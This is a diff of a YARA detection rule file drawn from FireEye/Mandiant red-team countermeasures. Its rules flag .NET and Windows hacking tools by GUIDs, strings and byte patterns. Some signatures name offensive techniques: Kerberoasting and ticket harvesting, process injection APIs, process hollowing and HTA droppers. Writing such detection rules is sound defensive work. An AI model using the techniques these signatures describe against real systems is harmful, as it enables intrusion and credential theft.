+		$pk2 = "80:75:3:4:" ascii wide
+		$pk3 = "80x75x3x4x" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 10MB and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPZIPLIBZIPPER_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSACK_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpziplibzipper' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsack' project."
 		author = "FireEye"
-		id = "392a52be-29ae-58e1-b517-1ab34a1e1fb8"
+		id = "8e344acb-73c4-5509-be9d-85cf6fe94445"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPZIPLIBZIPPER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSACK/production/yara/APT_HackTool_MSIL_SHARPSACK_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "19354edb91a0d79fdf79437f7247bcf155514db40340af91a3320b556dc2e4c2"
+		logic_hash = "ecc3250e65e34595b4b827add3eb3062edad6a3373930048bfd6225d4a229e93"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$typelibguid0 = "485ba350-59c4-4932-a4c1-c96ffec511ef" ascii nocase wide
+		$typelibguid0 = "1946808a-1a01-40c5-947b-8b4c3377f742" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Credsnatcher_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CredSnatcher' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "0d8f7495-4748-577d-8ef2-ccc4829fc165"
-		date = "2020-12-08"
+		id = "ce39710e-7649-5f7d-bbbe-65dc30f678e8"
+		date = "2020-12-04"
+		date = "2020-12-04"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_CredSnatcher_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "2c86be1bcf29bcb2c167f9248dee0ab4a5a5c6740fb1f18784ee2e380176df91"
+		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
+		logic_hash = "872ab717668375a49d6c7b1927a680747b405c0198fe4fc6f43ccc562870eb37"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "370b4d21-09d0-433f-b7e4-4ebdd79948ec" ascii nocase wide
+		$s1 = "\x00Asktgt\x00"
+		$s2 = "\x00Kerberoast\x00"
+		$s3 = "\x00HarvestCommand\x00"
+		$s4 = "\x00EnumerateTickets\x00"
+		$s5 = "[*] Action: " wide
+		$s6 = "\x00Fluffy.Commands\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPPATCHCHECK_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharppatchcheck' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "dedc12b9-b9e7-5c13-ad6d-2e286aba2302"
-		date = "2020-12-08"
+		id = "6593202d-9b30-59ed-98c0-3e730fb5ceb7"
+		date = "2020-12-04"
+		date = "2020-12-04"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPPATCHCHECK_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "dec6231b656eed1526d4f70fe1b9a476bfb06246f0a7c25f2687d8c68886d400"
+		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
+		logic_hash = "4d91c96ab7b628e88f79ee193612acc959448fe2220ef54371f5f5c6e7305d86"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "528b8df5-6e5e-4f3b-b617-ac35ed2f8975" ascii nocase wide
+		$sb1 = { 0E ?? 1? 72 [4] 28 [2] 00 06 [0-16] 28 [2] 00 0A [2-80] 1F 58 0? [0-32] 28 [2] 00 06 [2-32] 1? 28 [2] 00 06 0? 0? 6F [2] 00 06 [2-4] 1F 0B }
+		$sb2 = { 73 [2] 00 06 13 ?? 11 ?? 11 ?? 7D [2] 00 04 11 ?? 73 [2] 00 0A 7D [2] 00 04 0E ?? 2D ?? 11 ?? 7B [2] 00 04 72 [4] 28 [2] 00 0A [2-32] 0? 28 [2] 00 0A [2-16] 11 ?? 7B [2] 00 04 0? 28 [2] 00 0A 1? 28 [2] 00 0A [2-32] 7E [2] 00 0A [0-32] FE 15 [2] 00 02 [0-16] 7D [2] 00 04 28 [2] 00 06 [2-32] 7B [2] 00 04 7D [2] 00 04 [2-32] 7C [2] 00 04 FE 15 [2] 00 02 [0-16] 11 ?? 8C [2] 00 02 28 [2] 00 0A 28 [2] 00 0A [2-80] 8C [2] 00 02 28 [2] 00 0A 12 ?? 12 ?? 12 ?? 28 [2] 00 06 }
+		$ss1 = "\x00Fluffy\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_PRAT_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Netassemblyinject_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'prat' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NET-Assembly-Inject' project."
 		author = "FireEye"
-		id = "4a876eb0-ed2f-5ef2-a9b3-ba728b07c8c0"
+		id = "62a7dc4c-678b-5f13-9661-4679eafe1c72"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_PRAT_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETASSEMBLYINJECT/production/yara/Loader_MSIL_NETAssemblyInject_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "d707f017b56b0a873f1edca085ad40fc70cb24e8c9844f377bc28871a941d0b4"
+		logic_hash = "9a43df9ee26a44f4db5c2d22fbc1a6c86c5af0c9d44a79c6627a4cc8cf31bb8d"
 		score = 75
-		quality = 67
+		quality = 69
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$typelibguid0 = "7d1219fb-a954-49a7-96c9-df9e6429a8c7" ascii nocase wide
-		$typelibguid1 = "bc1157c2-aa6d-46f8-8d73-068fc08a6706" ascii nocase wide
-		$typelibguid2 = "c602fae2-b831-41e2-b5f8-d4df6e3255df" ascii nocase wide
-		$typelibguid3 = "dfaa0b7d-6184-4a9a-9eeb-c08622d15801" ascii nocase wide
+		$typelibguid0 = "af09c8c3-b271-4c6c-8f48-d5f0e1d1cac6" ascii nocase wide
+		$typelibguid1 = "c5e56650-dfb0-4cd9-8d06-51defdad5da1" ascii nocase wide
+		$typelibguid2 = "e8fa7329-8074-4675-9588-d73f88a8b5b6" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNFS_1 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_WILDCHILD_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnfs' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b9d1b4e8-644a-5611-85e8-a124f915b443"
-		date = "2020-12-08"
+		id = "b9e0707e-98eb-55da-ad1d-6a84bd113747"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNFS_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/APT_Loader_MSIL_WILDCHILD_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e7f9883376b153849970599d9ecc308882eb86a67834cfd8ab06b44539346125"
+		hash = "6f04a93753ae3ae043203437832363c4"
+		logic_hash = "a600c3d127f77dc1f99160e4a242e005970de0abd1798296b6a351b968ca1350"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid0 = "9f67ebe3-fc9b-40f2-8a18-5940cfed44cf" ascii nocase wide
+		$s1 = "\x00QueueUserAPC\x00"
+		$s2 = "\x00WriteProcessMemory\x00"
+		$sb1 = { 6F [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 13 ?? 28 [2] 00 0A 28 [2] 00 0A 13 ?? 11 ?? 11 ?? 28 [2] 00 0A [0-16] 7B [2] 00 04 1? 20 [4] 28 [2] 00 0A 11 ?? 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 [0-16] 14 7E [2] 00 0A 7E [2] 00 0A 1? 20 04 00 08 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 [0-16] 7B [2] 00 04 7E [2] 00 0A [0-16] 8E ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 [4-120] 28 [2] 00 06 [0-80] 6F [2] 00 0A 6F [2] 00 0A 28 [2] 00 06 13 ?? 11 ?? 11 ?? 7E [2] 00 0A 28 [2] 00 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_Win_Generic_19 : FILE
+rule FIREEYE_RT_Loader_MSIL_Wildchild_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the WildChild project."
 		author = "FireEye"
-		id = "4f4427ee-0f7d-5442-98a6-402d8b797289"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "350dd658-46c9-573b-b532-07e4b437ba8d"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_19.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Loader_MSIL_WildChild_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3fb9341fb11eca439b50121c6f7c59c7"
-		logic_hash = "6db9696663c19857c1f89339b8cc9b0565e877f34e8d8cf77b89ef22b3f41683"
+		hash = "7e6bc0ed11c2532b2ae7060327457812"
+		logic_hash = "e4320e33770613542182518ec787e4ccbb32f83c8afca5ec957d4846e6f4eb04"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 }
-		$s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 }
-		$si1 = "VirtualProtect" fullword
-		$si2 = "malloc" fullword
+		$typelibguid1 = "2e71d5ff-ece4-4006-9e98-37bb724a7780" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Loader_Win_Generic_20 : FILE
+rule FIREEYE_RT_Dropper_HTA_Wildchild_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This rule looks for strings present in unobfuscated HTAs generated by the WildChild builder."
 		author = "FireEye"
-		id = "d1d3eff8-d12e-53f6-8c30-06ecedaf3f49"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "f570baa5-7d58-5a0a-b713-769e62076f76"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_20.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Dropper_HTA_WildChild_1.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "5125979110847d35a338caac6bff2aa8"
-		logic_hash = "9611aed2b4e4278d40254cb5c4fe94a458cfa19f10e6fe888bc7ceb166669cc6"
+		hash = "3e61ca5057633459e96897f79970a46d"
+		logic_hash = "60c1d53b8a43b9b7518f3260a4d61c6806641ee894a2a331a3a0a2ea0aff9d99"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 5
 
 	strings:
-		$s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 }
-		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
-		$si1 = "VirtualProtect" fullword
-		$si2 = "malloc" fullword
+		$s1 = "processpath" ascii wide
+		$s2 = "v4.0.30319" ascii wide
+		$s3 = "v2.0.50727" ascii wide
+		$s4 = "COMPLUS_Version" ascii wide
+		$s5 = "FromBase64Transform" ascii wide
+		$s6 = "MemoryStream" ascii wide
+		$s7 = "entry_class" ascii wide
+		$s8 = "DynamicInvoke" ascii wide
+		$s9 = "Sendoff" ascii wide
+		$script_header = "<script language=" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$script_header at 0 and all of ( $s* )
 }
-rule FIREEYE_RT_Loader_MSIL_Generic_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_REVOLVER_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'revolver' project."
 		author = "FireEye"
-		id = "f919e3fc-cf76-53af-8f04-24921830666f"
+		id = "8fa5adb7-dc66-51bc-9f60-2308515f33a8"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_MSIL_Generic_1.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_HackTool_MSIL_REVOLVER_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "b8415b4056c10c15da5bba4826a44ffd"
-		logic_hash = "06cddd7e1c1c778348539cfd50f01d55f86689dec86c045d7ce7b9cd71690e07"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "8df8a56ed55b7857adb95daa643d544a49eb5f1952b4ad3ef757c34dad2ce317"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		rev = 5
+		rev = 2
 
 	strings:
-		$MSIL = "_CorExeMain"
-		$opc1 = { 00 72 [4] 0A 72 [4] 0B 06 28 [4] 0C 12 03 FE 15 [4] 12 04 FE 15 [4] 07 14 }
-		$str1 = "DllImportAttribute"
-		$str2 = "FromBase64String"
-		$str3 = "ResumeThread"
-		$str4 = "OpenThread"
-		$str5 = "SuspendThread"
-		$str6 = "QueueUserAPC"
+		$typelibguid0 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
+		$typelibguid1 = "b214d962-7595-440b-abef-f83ecdb999d2" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Builder_Win64_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE
 {
 	meta:
-		description = "matryoshka_pe_to_shellcode.rs"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "0afcf13e-5cd3-5c1c-897e-b6d0c283ab0f"
-		date = "2020-12-02"
-		date = "2020-12-02"
-		modified = "2020-12-09"
+		id = "d99620e0-39ed-58db-acce-0d885a9e0bf7"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_Win64_MATRYOSHKA_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_Loader_MSIL_REVOLVER_1.yar#L5-L14"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "8d949c34def898f0f32544e43117c057"
-		logic_hash = "b370d7dea44bccc92fc8dbd4ea0ee9bec523820108bf8bc67acb17ebf9835f74"
+		logic_hash = "1231f4c961dec122ebcb142052c2c7c03acf9b556cdb71a3efabde6bcf50a939"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
 
 	strings:
-		$sb1 = { 4D 5A 45 52 [0-32] E8 [0-32] 00 00 00 00 [0-32] 5B 48 83 EB 09 53 48 81 [0-32] C3 [0-32] FF D3 [0-32] C3 }
-		$ss1 = "\x00Stub Size: "
-		$ss2 = "\x00Executable Size: "
-		$ss3 = "\x00[+] Writing out to file"
+		$inject = { 28 [2] 00 06 0? 0? 7B [2] 00 04 7E [2] 00 0A 28 [2] 00 0A [2-40] 7E [2] 00 0A 0? 20 00 10 00 00 28 [2] 00 0A 0? 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? ?? 20 00 30 00 00 1F 40 28 [2] 00 06 [2-40] 28 [2] 00 0A 1? 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 1? ?? FE 15 [2] 00 02 1? ?? 72 [2] 00 70 28 [2] 00 06 1? ?? FE 15 [2] 00 02 1? ?? 1? ?? 1? 28 [2] 00 06 2? 7E [2] 00 0A 1? ?? 0? 7B [2] 00 04 1? ?? 1? 1? ?? 28 [2] 00 06 2? ?? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-10] 7E [2] 00 0A 1? ?? 1? ?? 20 [2] 1F 00 7E [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? 1? 20 [2] 00 00 20 [2] 00 00 7E [2] 00 0A 28 [2] 00 06 2? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-40] 1? ?? 0? 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 2? ?? 2? 1? 1? ?? 1? ?? 1? ?? 28 [2] 00 06 }
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_Tool_MSIL_Csharputils_1 : FILE
 {
 	meta:
-		description = "matryoshka_process_hollow.rs"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CSharpUtils' project."
 		author = "FireEye"
-		id = "69919a80-8ed1-5b8c-911a-ceb75570f11f"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "a0e8c45a-759a-5611-aa2a-3113a75fb651"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPUTILS/production/yara/Tool_MSIL_CSharpUtils_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "44887551a47ae272d7873a354d24042d"
-		logic_hash = "46e5480dc95ce8b9d8385c2e44a50b21629301535b93833c13cc3db319ac15dd"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "11dfd44fb4ee1e610c2e4a941b3a1e88eafc30a2a2237529150e73bceb2a1324"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 48 8B 45 ?? 48 89 85 [0-64] C7 45 ?? 00 00 00 00 31 ?? E8 [4-64] BA 00 10 00 00 [0-32] 41 B8 04 00 00 00 E8 [4] 83 F8 01 [2-32] BA [4] E8 }
-		$sb2 = { E8 [4] 83 F8 01 [2-64] 41 B9 00 10 00 00 [0-32] E8 [4] 83 F8 01 [2-32] 3D 4D 5A 00 00 [0-32] 48 63 ?? 3C [0-32] 50 45 00 00 [4-64] 0F B7 [2] 18 81 ?? 0B 01 00 00 [2-32] 81 ?? 0B 02 00 00 [2-32] 8B [2] 28 }
-		$sb3 = { 66 C7 45 ?? 48 B8 48 C7 45 ?? 00 00 00 00 66 C7 45 ?? FF E0 [0-64] 41 B9 40 00 00 00 [0-32] E8 [4] 83 F8 01 }
+		$typelibguid0 = "2130bcd9-7dd8-4565-8414-323ec533448d" ascii nocase wide
+		$typelibguid1 = "319228f0-2c55-4ce1-ae87-9e21d7db1e40" ascii nocase wide
+		$typelibguid2 = "4471fef9-84f5-4ddd-bc0c-31f2f3e0db9e" ascii nocase wide
+		$typelibguid3 = "5c3bf9db-1167-4ef7-b04c-1d90a094f5c3" ascii nocase wide
+		$typelibguid4 = "ea383a0f-81d5-4fa8-8c57-a950da17e031" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Dropper_Win_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_INVEIGHZERO_1 : FILE
 {
 	meta:
-		description = "matryoshka_dropper.rs"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'inveighzero' project."
 		author = "FireEye"
-		id = "7fd305c7-0b1b-5d91-b968-7f1fb0a8ae47"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "f46fe365-ea50-5597-828e-61a7225e4c6e"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win_MATRYOSHKA_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/INVEIGHZERO/production/yara/HackTool_MSIL_INVEIGHZERO_1.yar#L4-L15"
